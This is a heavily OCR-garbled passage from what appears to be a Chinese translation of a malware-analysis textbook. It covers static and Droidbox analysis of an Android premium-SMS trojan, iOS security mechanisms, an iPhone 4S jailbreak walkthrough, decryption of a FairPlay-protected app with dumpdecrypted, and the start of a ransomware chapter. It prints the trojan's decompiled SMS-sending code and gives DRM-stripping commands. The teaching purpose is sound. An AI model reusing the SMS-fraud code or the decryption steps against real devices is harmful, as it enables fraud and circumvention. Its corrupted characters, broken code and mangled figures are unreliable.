意 倾 回 细 市 的 应 用 程序 概 顺 。 以 下 便 是 经 过 精简 的 androapkinfo 输 出 的 一 个 示例 : 


$ ~/android/androguard/androapkinfo.py -d /tmp/apk 
demo.apk : 

FILES: 

PERMISSIONS: 

@android.permission. SEND SMS ['dangerous', 'send SMS messages', 
‘Allows application to send SMS messages. Malicious applications may 
cost you money by sending messages without your confirmation." ] 
MAIN ACTIVITY: org.me.androidapplicationl.MoviePlayer 
ACTIVITIES: 

Qorg.me.androidapplicationl.MoviePlayer 

('action': [u'android.intent.action.MAIN'], 

'category': [u'android.intent.category.LAUNCHER'!]] 
SERVICES: 

RECEIVERS: 

PROVIDERS: [|] 

Native code: False 

Dynamic code: False 

@Reflection code: False 

@ascii Obfuscation: False 
Lorg/me/androidapplicationl/MoviePlayer; OFLog ['ANDROID', 'UTIL'] 
OLorg/me/androidapplicationl/MoviePlayer; onCreate ['ANDROID', 
'TELEPHONY', 'SMS', 'WIDGET', 'APP', 'UTIL'] 
Lorg/me/androidapplicationl/RS$layout; OFLog ['ANDROID', 'UTIL'] 
QrLorg/me/androidapplicationl/HelloWorld; onCreate ['ANDROID', 
'TELEPHONY', 'SMS', 'WIDGET', 'APP', 'UTIL'] 
Lorg/me/androidapplicationl/RS$attr; OFLog ['ANDROID', 'UTIL'] 


399 


400 


第 部 分 rer ATE AAT 


我 们 再 次 得 到 该 应 用 的 权限 申请 清单 四 ， 以 及 潜在 恶意 行为 的 相关 信息 。 人 和 


@ 处 的 检查 用 来 标记 是 人 否 使 用 了 可 疑 的 代码 混 清 拉 术 ， 同 时 包括 一 个 活动 (Activity) 
列表 @ 作 为 入 口 扣 开始 代码 分 析 。 最后， 还 有 一 个 使 用 了 短信 功能 的 类 文件 列表 @、 
@， 和 需要 对 此 进行 调查 以 确保 短信 权限 不 锌 滥用 。 


为 检查 类 MoviePlayer 和 HelloWorld 的 代码 ， 我 们 对 应 用 程序 进行 反 编 译 并 定位 


$ ~/android/androguard/androdd.py -i /tmp/apk/demo.apk -o 
/tmp/apk/demo dad 

Dump information /tmp/apk/demo.apk in /tmp/apk/demo dad 
Create directory /tmp/apk/demo dad 

Analysis ... End 

Decompilation ... End 


$ find /tmp/apk/demo dad/ -iname "movieplayer.java" 
/tmp/apk/demo dad/org/me/androidapplicationl/MoviePlayer.java 
$ find /tmp/apk/demo dad/ -iname "helloworld.java" 
/tmp/apk/demo dad/org/me/androidapplicationl/HelloWorld.java 


该 应 用 的 主 活动 在 MoviePlayerjava 中 实现 ,这 使 它 很 适合 作为 分 析 的 候选 对 象 。 


可 以 使 用 任何 文本 编辑 器 检查 MoviePlayerjava, 但 最 好 文 持 Java 语 法 高 亮 显 示 功 能 。 
其 中 使 用 了 短信 功能 的 onCreate 函 数 的 完整 程序 清单 如 下 所 示 ; 


public void onCreate(android.os.Bundle p13) 
{ 
super.onCreate (p13); 
org.me.androidapplicationl.DataHelper v6; 
v6 — new org.me.androidapplicationl.DataHelper (this); 
if (v6.canwe()) { 
android.widget.TextView v9 — new android.widget.TextView(this); 
Qv 9.setText ("\u041£\u043e\u0434\u043e\u0436\u0434\u0438\u0442\ 
u0435, \ \u0437\u0430\u043£F\u0440\u0430\u0448\u0438\u0432\u0430\ 
u0435Nu0442 NV \u0441\u044f\u0434\u043e\u0441\u0442\u0443\u043f\ 
u043a\u0432\u00438\u0434\u0435\u043e\u0442\u00435\u043a\u0435.."); 
this.setContentView (v9); 
Qandroid.telephony.SmsManager vO = 
android.telephony.SmsManager.getDefault(); 
try 1 
@wv0.sendTextMessage ("3353", DU. "IUSSUBOIU., D UII 
try { 
@v0.sendTextMessage ("3354", 0, "798657", 0, 0); 
} catch (Exception v7) { 
android.util.Log.e("Oops in playsound", "", v7); 
} 
try { 
Qvo0.sendTextMessage ("3353", 0; "798657"; WU. UI. 
} catch (Exception v7) { 
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android.util.Log.e("Oops in playsound", "", v7); 


A— 
) catch (Exception v7) { 
android.util.Log.e("Oops in playsound", "", v7); 
o 
this-finish{}); 
return; 
} 
这 个 函数 的 第 一 个 可 疑 之 处 就 是 Unicode 文 本 缓冲 区 @。 对 于 反 编 译 器 而 言 ， 此 
处 是 输出 Unicode 字 符 串 的 一 种 安全 方式 ， 因 为 Unicode 在 文本 编辑 磺 中 可 能 无 法 正 
确 显示 。 本 例 中 的 字符 串 是 西里 尔 文 ， 翻 译 过 来 的 意思 是 :“ 稍 等 ， 请 求 访问 视频 
库 ……。” 接 下 来 ， 变 量 v0 被 初始 化 为 一 个 SmsManager 对 象 @。 瞻 、@ 和 人 @ 处 的 代码 
则 正在 试图 发 送 一 条 短信 。sendTextMessage 函 数 的 原型 如 下 所 示 : 
Void sendTextMessage (String destinationAddress, String scAddress, String 
text, PendingIntent sentIntent, PendingIntent deliveryIntent) 
在 本 例 中 ，destinationAddress 是 数字 3353 或 3354， 而 三 处 调用 传 入 的 参数 都 是 
798 657。 前 两 个 数字 归属 短信 增值 服务 ， 会 比 普通 短信 收取 更 高 的 费用 ， 而 目 定义 
的 消息 内 容 可 能 用 来 区 分 谁 在 充当 散 财 重子 。 
这 些 代码 看 上 去 绝对 不 像 是 电影 播放 震 应 用 的 正 彰 行 为 ， 而 且 快速 浏览 其 他 反 
编 详 后 的 文件 也 显示 代码 量 很 少 ， 几 乎 没有 与 广告 相关 的 功能 。 此 关 恶 意 软 件 在 手 
机 应 用 中 非常 普遍 ， 因 为 它们 能 给 软件 作者 带 来 直接 的 经 济 收益 。 
黑 盒 模拟 器 这 个 强大 工具 用 于 监视 恶意 软件 样本 ， 不 必 阅 读 代码 就 能 了 解 其 功 
能 。Droidbox 是 一 个 提供 了 API 调 用 监控 功能 的 经 过 特殊 修改 的 Android 系 统 镜 像 ， 
它 是 一 个 定制 的 Android 模 拟 伏 镜像 文件 , 使 用 baksmali/smali 午 写 了 应 用 以 记录 所 有 
监测 到 的 API 调 用 及 其 参数 。 这 是 理解 恶意 应 用 或 验证 静态 分 析 中 所 发 现 问题 的 非 
前 好 的 起 步 方法 。 


18.1.9 示例 18-2: 运用 Droidbox 进 行 黑 盒 APK 监 控 


coy 注意 : 本 练习 之 所 以 作为 示例 而 非 实验 提出 ， 是 因为 本 练习 需要 使 用 恶意 


Droidbox 带 有 经 过 特殊 修改 的 Android 镜 像 ， 在 解压 用 于 安装 的 归档 文件 后 可 以 
很 容易 地 局 动 该 镜像 。 如 下 所 示 ， 首 先 运 行 定 制 的 Android 镜 像 : 


$ ~/android/droidbox-read-only/DroidBox 4.1.1/emulator -avd DBOX \ 
-system images/system.img -ramdisk images/ramdisk.img -wipe-data ^ 


401 


第 部 分 高 级 恶意 软件 分 析 


-prop dalvik.vm.execution-mode-int:portable 


局 动 Android 镜 像 后 ， 便 可 在 模拟 器 中 运行 恶意 应 用 并 收集 日 志 一 一 可 通过 
droidbox.sh 脚 本 在 仿真 右 中 对 应 用 程序 进行 检测 ， 束 像 这 样 : 


$ ~/android/droidbox-read-only/DroidBox 4.1.1/droidbox.sh demo.apk 


Waiting for the device... 
Installing the application /home/demo/apk samples/demo.apk... 
Running the component 
org.me.androidapplicationl/org.me.androidapplicationl.MoviePlayer... 
Starting the activity .MoviePlayer... 
Application started 
Analyzing the application during infinite time seconds... 

[\] Collected 10 sandbox logs (Ctrl-C to view logs) 
{ 

"apkName": "/home/demo/apk samples/demo.apk", "enfperm": [], 
"recvnet": {}, "servicestart": {}, "sendsms": {"1.0308640003204346": 
["message"- "798657", "type": "sms", "number": "3353"}, "1.109165159165039006" : 
["message": "798657", "type": "sms", "number": "3354"], "1.1251821517944336": 
("message": "7986057", 


} 


等 待 一 段 时 间 后 ， 按 下 Ctrlt+C 组 合 键 停止 监控 ， 此 时 将 以 JSON 格 式 输出 日 志 。 
限于 户 幅 ， 上 面 仅 是 下 选 的 输出 。 要 以 更 肥 好 的 形 陈 竹 出 JSON 格 式 ， 可 使 用 如 下 
命令 : 


$ cat droidbox.json | python -mjson.tool 
"Sendsms": { 
"1.0308640003204346": { 
"message": "798697", 
"number": "3353", 


TT 1 


"type": "sms 

Fr 

"1.1091651916503 906": { 
"message": "798057", 
"number": "3354", 


TT W 


"Lype": "sms 

} r 

71.1251821517944336": | 
"message": "7986057", 
"number": "3353", 


v" 1 


"type": "sms 


by 


"servicestart": {} 
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从 上 述 输出 可 以 明显 地 看 出 ， 就 像 之 前 静态 分 析 的 那样 ， 该 应 用 发 送 了 三 条 短 
信 。 使 用 这 种 简便 的 方式 来 观察 并 深入 了 解 应 用 程序 的 实际 活动 ， 对 于 分 析 恶 意 软 
件 是 非常 有 帮助 的 。 应 该 注意 的 是 此 种 方法 不 宜 单独 使 用 ， 而 应 结合 应 用 程序 的 逆 
问 工程 一 同 使 用 。 由 于 此 类 黑 盒 方法 并 不 保证 恶意 功能 部 分 在 监控 期 间 一 定 会 被 执 
行 ， 因 此 可 能 会 错过 一 部 分 或 全 部 的 恶意 代码 。 这 种 情况 下 ， 可 能 会 做 出 错误 的 假 
设 一 一 该 应 用 程序 “不 作恶 ” 而 实际 上 却 隐藏 了 可 能 的 恶意 行为 。 

为 获得 最 佳 效 果 ， 建 议 将 应 用 程序 代码 的 静态 分 析 和 黑 盒 监 控 结 合 起 来 使 用 。 

黑 盒 恶意 软件 分 析 是 获取 恶意 软件 功能 概况 的 一 种 廉价 方式 ， 可 为 更 深入 的 静 
态 分 析 找 出 值得 关注 的 切入 点 。Droidbox 是 一 个 简单 易 用 的 黑 盒 Android 分 析 系 统 ， 
可 以 很 容易 扩展 并 改造 成 自动 化 分 析 系 统 来 对 大 量 样本 进行 分 类 处 理 ， 并 在 所 生成 
报告 的 基础 上 构建 针对 恶意 软件 的 知识 库 。 


18.2 _ iOS 平台 


IDC 的 全 球 季度 移动 手机 跟 踩 报告 显示 ， 在 2007 年 第 一 季度 ，Apple 的 iDS 在 移 
动 操 作 系 统 市 场所 占 的 份额 为 14.7%。iOS 运 行 在 多 种 Apple 设 备 上 , 包括 iPhone iPad 
和 iPod。 与 Android 条 持 的 开放 理念 相反 ，iOS 仅 用 于 Apple 产 品 ， 这 样 Apple 可 更 汉 
密 地 控制 生态 系统 。 由 于 以 上 原因 ， 同 时 由 于 Apple 主 动 审 查 iOS 应 用 程序 ，Apple 
应 用 商店 几乎 不 存在 恶意 软件 ; 对 于 可 能 违背 Apple 策 略 的 可 疑 之 处 ,即使 程度 很 轻 ， 
也 要 被 加 上 标记 ， 从 Apple 应 用 商店 消除。 不 过 ， 仍 可 从 市 场 上 买 到 针对 1OS 的 间 诬 
软件 工具 ， 如 吴 名 上 申 闭 的 Pegasus 辐 诬 软 件 ， 访 人 恶 间 软件 使 用 三 种 不 同 的 漏洞 来 攻击 
iPhone 的 安全 防线 ， 并 舌 视 受 感 染 的 用 户 。 


18.2.1 iOS 安 全 


iOS 历 经 多 年 发 展 ， 已 成 为 当今 最 安全 的 移动 设备 平台 之 一 。 它 包含 完整 的 安 
全 栈 ， 全 面 涵盖 手机 安全 的 所 有 方面 硬件、 应 用 分 离 、 数 据 加 密 和 漏洞 补救 。 

本 节 将 详细 分 析 其 中 的 一 些 安全 机 制 ， 这 些 安全 机 制 为 理解 ioS 威 肋 场景 黄 定 
了 基础 。 


1. 安全 引导 

对 于 安全 可 靠 的 平台 而 言 ， 引 导 过 程 期 间 的 安全 初始 化 是 必需 的 。 如 果 不 能 确 
保 引 导 过 程 未 经 得 改 ， 束 不 能 信任 由 操作 系统 提供 和 实施 的 任何 安全 机 制 。 为 解决 
这 个 问题 ， 所 有 现代 操作 系统 都 利用 便 件 功能 ， 确 保 在 操作 系统 代码 之 前 执行 的 代 
码 以 及 操作 系统 代码 本 身 都 未 发 生变 化 。 我 们 使 用 代码 签名 进行 验证 ， 也 就 是 在 每 
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个 步骤 ， 都 检查 和 验证 Apple 代 码 签名 ， 此 后 才 进 入 下 一 步 。 

引导 过 程 首 移 执 行 Boot ROM 代 人 码 ， 在 物理 心 片 制造 过 程 中 ， 己 经 内 骨 f Boot 
ROM 人 代码， 其 中 包含 Apple 的 根 CA 公 钥 。 使 用 该 公 钥 来 验证 引导 期 间 执 行 的 所 有 代 
码 (例如 ， 引 导 加 载 程 序 、 基 带 固 件 、 内 核 和 内 核 模块 ) 都 具有 Apple 的 签名 。 由 于 在 
BootROM 之 前 什么 都 不 执行 ， 因 此 Boot ROM 代 码 受 到 隐 式 信任 ; 但 由 于 它 通过 物 
理 方式 租 入 心 片 ， 因 此 这 是 一 个 可 接受 的 风险 。 如 果 攻 击 者 试图 破解 手机 并 获得 手 
机 的 完全 控制 权 ， 安 全 引导 是 让 攻击 者 最 无 计 可 施 的 安全 措施 之 一 。 


2. 加 密 和 数据 保护 


i1O0S 通 过 本 地 人 硬件 加 密 功 能 ， 提 供 快速 和 安全 的 加 密 操 作 。iOS 使 用 包含 256 位 
窗 钥 的 AES 来 加 密 存储 器 蕊 片上 的 数据 ， 提 供 全 磁盘 加 密 。 全 磁盘 加 密 保 护 数据 ， 
即使 攻击 者 可 以 物理 访问 设备 ， 只 要 攻击 者 不 能 运行 代码， 也 就 无 法 获得 数据 。 

那么 ,如果 攻击 者 可 以 访问 设备 上 的 代码 ,该 怎么 办 呢 ? Apple 使 用 数据 保护 技 
术 来 解决 这 个 问题 。 该 技术 允许 开发 人 员 使 用 定制 的 加 密 密 钥 来 加 密 应 用 数据 ， 如 
果 密 钥 受 损 , Wisin up. 这 些 特定 于 应 用 的 密 钥 的 访问 控制 由 OS 管理 , 这 样 ， 
同时 运行 在 设备 上 的 恶意 应 用 无 法 访问 另 一 个 应 用 的 密 铀 ， 从 而 阻止 恶意 应 用 读 取 
私有 数据 。 

在 201$ 年 和 2016 年 ， 由 于 FBI 和 Apple 双 方 就 加 密 方面 的 诉讼 ， 媒 体 开 始 讨论 
Apple 加 密 。 对 Apple 的 诉讼 的 重点 在 于 : 执行 部 门 无 法 访问 设备 上 加 密 的 犯罪 数据 ， 
法 院 和 执行 部 门 强迫 制造 两 帮助 解 锁 ， 用 以 访问 此 类 设备 上 的 加 密 数 据 。 虽 然 FBI 
设法 找到 一 家 公司 来 绕 过 保护 ， 但 事实 表明 ， 只 有 专业 的 资源 才能 绕 过 保护 。 


3. 应 用 程序 沙 箱 


应 用 程序 沙 箱 是 一 种 安全 机 制 ， 用 于 隔离 同一 系统 上 运行 的 不 同 应 用 程序 的 执 
行 环境 。 在 使 用 沙 箱 隔 离 的 环境 中 ， 攻 击 一 个 应 用 程序 不 会 危害 或 影响 其 他 沙 箱 环 
境 。 通 过 对 系统 资源 进行 细 粒 度 的 访问 控制 ， 可 实施 沙 箱 隔 离 技 术 。 沙 箱 应 用 需要 
明确 表明 需要 哪些 系统 授权 才能 正常 工作 。 下 面 古 一 些 应 用 程序 可 以 请 求 访问 的 授 
DEN 

e 人 硬件 ”访问 摄像 关 、 专 元 风 和 USB 等 资源 。 

e 网 络 连 接 ”允许 友 送 和 接收 网 络 流量 。 

e 应 用 程序 数据 ”访问 日 历 、 联 系 人 和 位 置 等 资源 。 

e 用 户 文 件 ”允许 访问 图 片 、 下 载 资 料 和 音乐 的 用 户 文 件 夹 。 

在 运行 时 ， 如 果 壬 试 从 一 个 沙 箱 访 问 资源 ， 却 未 在 项 目 定义 中 显 式 请 求 权限 ， 
将 被 操作 系统 拒绝 。 
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18.22 _ ”iOS 应 用 程序 


iOS 应 用 程序 归档 文件 (扩展 名 为 .ipa) 的 格式 和 结构 类 似 于 Android APK. 两 者 都 
是 ZIP 归 档 文 件 , 使 用 自 定 义 的 文件 扩展 名 , 其 中 包含 应 用 程序 正常 运行 需要 的 所 有 
文件 。 在 下 面 的 十 六 进 制 转 储 中 可 以 看 到 ，IPA 归 档 文件 的 魔法 字 节 与 典型 ZIP 头 中 
的 相同 : 
$ hexdump -C -n 4 sample.ipa 
00000000 50 4b 03 04 |PK.. | 
应 用 程序 归档 文件 包含 应 用 程序 的 可 执行 文件 、 配 置 文件 以 及 其 他 任何 数据 或 
图 像 资 源 。 根 据 Apple 的 描述 ， 归 档 文 件 中 的 常见 文件 类 型 如 下 : 
e Info.plist 信息 属性 列表 文件 是 AndroidManifest.xml 配 置 文件 的 OS 版 本 。 这 
是 一 个 必需 的 配置 文件 ,包含 天 于 应 用 程序 的 信息 ， 如 权限 、 文 持 的 平台 以 
及 其 他 相关 配置 文件 的 名 称 。 
e 可 执行 文件 ”必需 的 文件 ， 包 含 应 用 程序 代码 。 
e 资源 文件 ”诸如 图 像 和 图 标的 附加 可 选 数据 文件 。 可 为 特定 语言 、 区 域 使 用 
本 地 化 资源 ， 也 可 以 共享 这 些 资源 。 
e 文 持 文件 不 属于 资源 的 附加 文件 ， 如 私有 框架 和 插件 。 
iOS 应 用 程序 和 macOS 应 用 程序 一 样 ， 通 党 使 用 Objective-C 或 swift 编程 语 言 
Objective-C 是 过 用 的 、 面 问 对 象 的 编程 语言 ， 在 2014 年 Apple 公 司 引 入 Swift 前 ， 
一 直 是 在 Apple 平 台 上 开发 应 用 程序 的 主要 语言 。 
Swift 是 Objective-C 的 继承 者 ， 它 使 用 人 简单， 运行 速度 快 ， 类 型 安全 ， 同 时 可 维 
护 与 Objective-C 和 C 的 兼容 性 。 


18.2.3 ”实验 18-1: 分 析 二 进 制 属 性 列表 文件 


属性 列表 文件 (plisb 存 储 了 层次 化 对 象 的 序列 化 对 象 表示 ， 为 开 有 友人 员 提 供 了 
一 种 可 移植 的 轻 量 级 方法 来 存储 少量 数据 。 这 些 文 件 可 包含 各 种 数据 类 型 ， 如 数组 、 
字典 、 字 符 串 、 数 据 、 整 数 、 浮 点 值 或 布尔 值 等 。 

.plist 文 件 可 存储 为 XML 或 二 进 制 格式 。 由 于 XML 文件 可 使 用 任意 文本 编辑 器 读 
取 ， 因 此 易于 打开 和 分 析 。 而 二 进 制 文件 .plist 在 显示 为 我 们 便于 恋 取 的 格式 前 ， 需 

在 本 实验 中 , 我 们 使 用 VirusTotal 上 的 恶意 文件 ,分 析 二 进 制 文件 .plist。 下 载 iOS 
应 用 程序 归档 文件 后 , 首先 要 用 unzip 工 具 将 内 容 解 压缩 @。 要 确定 .plist 文 件 的 疾 型 ， 
可 使 用 可 用 的 file 工 具 @。macOS 自 带 plutil 工 具 ， 可 在 二 进 制 、XML 和 JSON .plist 格 
式 之 间 转 换 。 为 此 ， 我 们 只 需要 将 所 需 格式 指定 为 -convert 选 项 的 参数 四。 下 面 是 将 
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二 进 制 文件 .plist 转 换 为 XML， 并 读 取 其 内 容 的 命令 的 输出 @: 


$ file 98e9e65d6e674620eccaf3d024af1e7b0736cc889e94a698685623d146d4fb15f 
98e9e65d6e674620eccaf3d024af1e7b50736cc889e94a698685623d146dA4fb15f: 
Zip archive data, at least v2.0 to extract 


Os unzip 
98e9e65d6e674620eccaf3d024af1e7b736cc889e94a698685623d146dA4fb15f 
Archive: 
98e9e65d6e674620eccaf3d024af1e7b7736cc889e94a698685623d146dA4fb15f 
inflating: iTunesMetadata.plist 
creating: Payload/NoIcon.app/ 


inflating: Payload/NoIcon.app/Info.plist 


Q5 file Payload/NoIcon.app/Info.plist 
Info.plist: Apple binary property list 


@s plutil -convert xmll Payload/NoIcon.app/Info.plist 
$ file Info.plist 
Info.plist: XML 1.0 document text, ASCII text 


Qs head Payload/NoIcon.app/Info.plist 

<?xml version-"1.0" encoding="UTF-8"?> 

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" 

"http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 

<plist version="1.0"> 

<dict> 
<key>BuildMachineOSBuild</key> 
<string>14C109</string> 
<key>CFBundleDevelopmentRegion</key> 
<string>en</string> 
<key>CFBundleDisplayName</key> 
<string>Passbook</string> 


18.2.4 实验 18-2: iPhone 4S 越 狱 


在 研究 iOS 时 ， 最 好 有 一 部 越狱 (iailbreal) 的 iPhone 或 iPad 等 iDOS 设 备 。 有 了 这 样 
一 部 设备 ， 就 可 以 更 方便 地 执行 未 加 签名 的 代码 ， 更 方便 地 操控 设备 。 

入 手 时 最 廉价 的 设备 是 iPhone 4S， 二 手 价格 约 为 50 美 元 。iPhone 4S 支 持 的 最 新 
iOS 版 本 是 iOS 9.3.5， 可 以 半 不 受 限 越狱 。 根 据 经 过 安全 防御 撞 施 的 持续 性 不 同 ， 存 
在 如 下 多 种 越狱 关 型 : 

e 不 受 限 这 是 最 具 持 续 性 的 破解 类 型 , USB. Yr uuu. 即使 在 设备 

重新 局 动 后 ， 也 不 需要 将 设备 连接 到 计算 机 或 再 次 运行 exploit。 

e 半 不 受 限 与 不 受 限 类 似 , 不 要 求 将 设备 连接 到 计算 机 ,但 在 设备 重新 局 动 

后 ， 要 求 运行 exploit。 
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e SRE 这 是 持续 性 最 差 的 破解 类 型 ， 只 能 暂时 性 绕 过 。 一 旦 设备 重新 局 动 ， 
前 面 未 打 补 丁 的 内 核 版 本 将 运行 ， 由 于 处 于 不 一 致 的 越狱 状态 ,还 可 能 无 法 
正常 工作 。 

e 半 受 限 与 受 限 的 破解 类 似 , 也 是 暂时 绕 过 ; 但 在 设备 重新 局 动 并 引导 未 打 
补丁 的 i9S 成 本 时 ， 设 备 将 继续 正 贡 工作 。 

要 完成 iPhone 4S 越 狱 ， 需 要 使 用 Phoenix 破 解 工具 ， 步 骤 如 下 : 

(1) 在 手机 上 运行 越狱 应 用 程序 前 ， 有 必要 下 载 Phoenix4.ipa 和 Cydia Impactor 工 

并 拨 贝 到 果 面 操作 系统 上 。 

(2) 安装 Cydia Impactor， 将 iPhone 4S 设 备 连 接 到 计算 机 。 

(3) 运行 Cydia Impactor， 将 Phoenix4.ipa 拖 放 到 Cydia UI 中 。 

(4) 在 系统 提示 将 IPA 安 装 到 手机 上 时 ， 输 入 Apple ID。 

(5) 在 手机 上 ， 打 开 Settings | General | Device Management， 选 择 安 装 期 间 使 用 

的 Apple ID 配置 文件 。 单 击 Trust 按钮 ， 开 始 在 于 机 上 运行 己 安 疼 的 IPA 应 用 程序 。 

(6) 在 手机 上 局 动 Phoenix 恬 用 程序 , 然后 选择 Prepare for Jailbreak, Begin Installation, 
and Use Provided Offsets. 

(7) 设备 重新 局 动 后 ,再 次 局 动 Phoenix 应 用 程序 , 你 将 看 到 以 下 报告 一 一 “Your 
iPhone4,2 is jailbroken. You may launch Cydia from the home screen.”(“ 你 的 iPhone 4S 
越狱 成 功 ， 你 可 从 主屏 者 局 动 Cydia。”) 


^ 
/ 


18.2.5 ”实验 18-3: REZZApplerSI NL Ate 


作为 FairPlay 数 字 上 成 权 管 理 (Digital Rights Management, DRM)TT nf fJ— 3527. M 
Apple 丙 店 下 载 的 应 用 程序 的 代码 都 是 加 密 的 。 这 么 做 的 目的 是 防止 研究 人 员 下 载 应 
用 程序 ， 并 在 指定 的 iPhone 设备 以 外 分 析 代 码 。 

要 检查 可 执行 文件 是 人 否 已 经 加 密 ， 可 使 用 macOS 目 带 的 otool， 查 看 crypt* 参 数 
的 值 。 如 果 cryptid 的 值 为 1!1， 则 表明 加 密 了 可 执行 文件 ， 只 有 人 解密 后 才能 对 其 进行 
分 析 。 

$ file VLC\ for\ iOS 

VLC for 10S: Mach-O 64-bit executable arm64 


$ otool -arch all -V1 VLC\ for\ iOS | grep crypt 
cryptoff 16384 
cryptsize 23412736 
cryptid 1 
BOT 28 ELIE AY FARE AI, dee f] 88 105] AEA CRMA PLE PEP AE AE e 
这 里 将 使 用 Stefan Esser 开 发 的 破解 转 储 工 具 。 该 工具 将 动态 库 注 入 应 用 程序 的 地 址 
空间 ， 和 直接 从 存储 强 中 读 取 解 密 的 内 容 ， 将 其 写 入 磁盘。 本 实验 中 将 解密 的 应 用 程 
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Fre iTunes Liz EN Bar &8 VLCTRBURS o 

首先 使 用 iproxy 讽 置 SSH over USB, f£ HSSHXEfZ$liPhoneVz$& 9. E MA 
VLC 应 用 程序 文件 夹 的 位 置 正确 无 误 @。 要 在 VLC 中 加 载 破 解 转 储 工 具 ， 需 要 使 用 
DYLD INSERT LIBRARIES 环 境 变 量 ， 指 示 加 载 句 在 VLC 地 址 空间 中 插入 其 他 库 
@。 用 该 工具 保存 内 存 转 储 后 ， 我 们 可 以 检查 后 级 为 *.decrypted 的 文件 @。 

@ osxSiproxy 2222 22 


osx$ ssh root@localhost -p 2222 
root@localhost's password: 


QiPhone-4s:- root# ls 
/var/containers/Bundle/Application/EA56F383-AC2E-4BB7-ACD8-F0750A 
7AA641/VLCX for\ iOS.app/ iTunesArtwork iTunesMetadata.plist 


iPhone-4s:~ root4 cd tools/ 

QiPhone-4s:-/tools root# DYLD INSERT LIBRARIES-dumpdecrypted.dylib 
/private/var/containers/Bundle/Application/EA56F383-AC2E-4BB7-ACD 
8-FO750A7AA641/VLC\ for\ iOS.app/VLCM for\ iOS 

mach-o decryption dumper 


DISCLAIMER: This tool is only meant for security research purposes, 
not for application crackers. 


[+] detected 32bit ARM binary in memory. 

[+] offset to cryptid found: @0x1000ecca8 (from 0x1000ec000) = ca8 
[+] Found encrypted data at address 00004000 of length 23412736 bytes 
- type 1. 

[+] Opening /private/var/containers/Bundle/Application/EA56F383- 
AC2bE-4BB7-ACD8-F0750A7AA641/VLC for iOS.app/VLC for iOS for reading. 
[+] Reading header 

[+] Detecting header type 

[+] Executable is a plain MACH-O image 

[+] Opening VLC for 10S.decrypted for writing. 

[+] Copying the not encrypted start of the file 

[+] Dumping the decrypted data into the file 

[+] Copying the not encrypted remainder of the file 

[+] Setting the LC ENCRYPTION INFO->cryptid to 0 at offset ca8 

[+] Closing original file 

[+] Closing dump file 


iPhone-4s:-/tools root# ls 
Q vLCN for\ iOS.decrypted dumpdecrypted.dylib 


可 使 用 sftp 从 手机 下 载 转 储 的 内 容 : 


osx$ sftp -P 2222 root@localhost 
sftp> get tools/VLC\ for\ iOS.decrypted 


要 确保 真正 解密 代码 ， 可 再 次 使 用 otool， 查 看 cryptid 的 值 ， 此 时 应 当 为 0， 指 示 
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这 是 一 个 未 保护 的 文件 : 


$ file VLC\ for\ iOS.decrypted 
VLC for iOS.decrypted: Mach-O 64-bit executable arm64 


$ otool -arch all -V1 VLC\ ftor iOS.decrypted | grep crypt 
VLC for iOS.decrypted: 
cryptoff 10384 
cryptsize 23412736 
cryptid 0 
此 时 ， 我 们 有 了 实际 的 可 执行 代码 ， 可 使 用 IDA、Binary Ninja. Hopper. GNU 
Project Debugger (GDB) 或 LLDB Debugger 等 分 析 工 具 以 及 本 章 讨 论 的 恶意 软件 分 析 
方法 ， 对 实际 代码 进行 分 析 。 


18.3 ”本草 小 结 


当 消 费 者 不 断 接 有 党 新 扩 术 并 将 其 作为 生活 的 一 部 分 时 ， 亚 意 软件 的 作者 也 在 改 
变 策 略 并 迁移 到 这 些 新 技术 。 答 能 手机 作为 一 种 无 处 不 在 并 且 能 随时 保持 在 线 的 设 
备 ， 也 自然 日 益 赢得 恶意 软件 的 “关注 ”。 木马 们 忙于 窃取 个 人 资料 ， 后 门 让 攻击 者 
如 入 无 人 之 境 ， 广告 软件 则 是 牟利 工具 …… 这 些 都 症 智能 手机 世界 中 的 潜在 威胁 。 

Xf Android FiOS KLE A Hr AC [a] PEE AS I IE Se HY Windows ik me KF 
DATE, BERRE- EAR. RRC EAS BUA RT AE EEA 
AO A Nt MARE PIF AE XE BEER EMT Ao BRR RPS ER A RS EU SBT SEX 
术 上 ， 研 究 人 员 也 应 顺应 这 一 潮流 来 发 展 相应 的 分 析 工 具 和 技术 。 
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本 章 剖 析 被 称 为 勒索 软件 的 一 类 独特 恶意 软件 ， 勒 索 软 件 可 劫持 用 户 系统 并 以 
JI] SE EET EI RR e 


本 章 将 村 论 以 下 主题 : 

勒索 软件 的 历史 
赎金 文 付 选项 

剖析 Ransomlock 

在 内 存 中 解码 
反 调 试 检 碍 

BREL Si 

识别 和 分 析 Wannacry 加 密 


19.1 勒索 软件 的 历史 


勒 案 软 件 是 一 类 独特 的 恶意 软件 ， 它 们 可 完全 控制 用 户 机 器 直至 受害 者 文 付 赎 
金 。 为 增加 巧 取 肾 夺 钱 财 的 机 会 ， 了 恶 意 软件 津 将 目 己 伪装 成 来 日 执法 机 构 等 ， 声 称 
捕捉 到 终端 用 户 有 访问 未 经 授权 网 站 的 行为 ， 因 此 要 求 用 户 文 付 违约 彝 用 。 还 有 其 
他 一 些 欺 骗 终端 用 户 的 手段 ， 包 括 弹 出 伪造 的 Windows 产 品 激活 界面 ， 借 口 检测 到 
菏 个 特殊 欺诈 要 求 受害 者 文 付费 用 重新 激活 系统 。 通 常 ， 骗 子 们 都 会 设 定 交 纳 赎 金 
的 期 限 ， 迫 使 用 户 在 被 勒索 软件 感染 后 即刻 付 钱 。 在 本 章 的 “扩展 阅读 ”中 ， 可 找 
到 一 段 来 自 赛 门 铁 克 公司 (Symantec) 的 视频 ， 它 很 好 地 解释 了 什么 是 勒索 软件 。 

根据 操纵 数据 方式 的 不 同 ， 对 勒索 软件 有 几 种 不 同 分 类 。 

e Crypters 此 类 勒索 软件 加 密 用 户 数据 ， 有 效 地 扣留 数据 进行 勒索 ， 直 到 受 

害 者 愿意 交纳 赎金 得 到 解密 密 钥 为 止 。 

e Lockers ”此 类 勒索 软件 利用 各 种 技术 阻止 用 户 与 操作 系统 交互 。 此 时 ， 会 

扣留 操作 系统 进行 勒索 ， 用 户 磁 盘 上 的 数据 不 会 被 恶意 软件 修改 。 

e Leakware(Doxware) “与 前 两 类 勒 系 软件 不 同 ， 在 Leakware 中 ， 攻 击 者 无 权 

访问 数据 ， 而 通 第 使 用 远程 管理 工具 来 笑 探 受害 者 的 数据 。 此 后 ， 攻 击 者 会 
发 出 威胁 ， 如 果 受 害 者 拒 付 赎金 ， 他 们 将 公布 数据 。 
